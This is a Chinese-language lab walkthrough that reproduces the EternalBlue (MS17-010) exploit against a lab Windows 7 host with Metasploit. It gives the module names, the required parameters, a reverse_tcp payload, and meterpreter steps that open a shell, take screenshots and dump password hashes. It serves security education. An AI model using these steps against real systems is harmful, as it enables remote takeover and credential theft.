目录
实验环境
kali攻击机 172.23.19.152
windows7靶机 172.23.19.128
实验目的
通过MSF复现永恒之蓝漏洞
永恒之蓝简介
背景:
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
原理:
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
Metasploit简介
Metasploit 是The Metasploit framework的简称,框架由多个module组成是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的漏洞,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 Msf所有的漏洞测试都是基于模块
复现永恒之蓝漏洞
实验前提 windows7 防火墙关闭 并且 并没有更新最新系统(漏洞还存在)
1 首先使用namp扫描一下windows7
发现 主机开放了445端口(445端口是windows7默认开启的)
如果445端口开启 就可能存在永恒之蓝漏洞
2 使用工具
使用攻击机进入msf 使用 命令 msfconsole 进入msf控制台
3 查找 永恒之蓝漏洞模块
使用命令search 搜索 关于永恒之蓝ms17-010的exp(漏洞利用)以及扫描漏洞是否存在的模块
序号0 exploit/windows/smb/ms17_010_eternalblue 为永恒之蓝漏洞利用模块
序号3 auxiliary/scanner/smb/smb_ms17_010 为永恒之蓝漏洞检测模块
4 漏洞检测
使用命令 use 3 进入 检测模块
使用命令 show missing 查看必写参数(这里必写的参数 rhost为靶机ip)
使用命令 run 启动模块
检测出了 永恒之蓝漏洞!!
5 实现漏洞利用
use 0 进入漏洞利用模块
show missing 查看必填参数
payload 模块 我们需要填写 本机ip 以及监听端口
因为 这是一个反弹shell reverse_tcp
run 启动模块
成功复现!!!!
接下来就可以在meterpreter下 输入命令了
meterpreter 是一个比 shell还强大的工具
6 meterpreter 命令举例
使用命令shell 就可以直接进入 windows7 的 cmd 命令行模式
由于编码问题 不会显示中文 会乱码 我们输入chcp65001 这样会好很多
使用 screenshot 截取当前 windows7的屏幕
hashdump查看 windows7 的 账户密码的 哈希值